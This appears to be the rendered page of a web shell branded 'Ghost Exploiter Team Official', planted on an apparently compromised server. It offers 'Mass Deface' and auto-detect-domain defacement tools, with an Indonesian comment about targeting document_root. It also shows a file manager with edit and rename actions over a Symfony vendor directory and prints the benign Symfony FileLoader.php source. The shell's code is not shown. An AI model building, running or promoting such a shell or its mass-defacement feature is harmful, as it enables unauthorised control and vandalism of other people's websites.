Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
symfony
/
serializer
/
Mapping
/
Loader
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
schema
--
ren
AccessorCollisionResolv
...
3.29KB
edt
ren
AttributeLoader.php
11.318KB
edt
ren
FileLoader.php
1.012KB
edt
ren
LoaderChain.php
1.852KB
edt
ren
LoaderInterface.php
0.559KB
edt
ren
XmlFileLoader.php
6.317KB
edt
ren
YamlFileLoader.php
7.014KB
edt
ren
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Serializer\Mapping\Loader; use Symfony\Component\Serializer\Exception\MappingException; /** * Base class for all file based loaders. * * @author Kévin Dunglas <dunglas@gmail.com> */ abstract class FileLoader implements LoaderInterface { /** * @param string $file The mapping file to load * * @throws MappingException if the mapping file does not exist or is not readable */ public function __construct( protected string $file, ) { if (!is_file($file)) { throw new MappingException(\sprintf('The mapping file "%s" does not exist.', $file)); } if (!is_readable($file)) { throw new MappingException(\sprintf('The mapping file "%s" is not readable.', $file)); } } }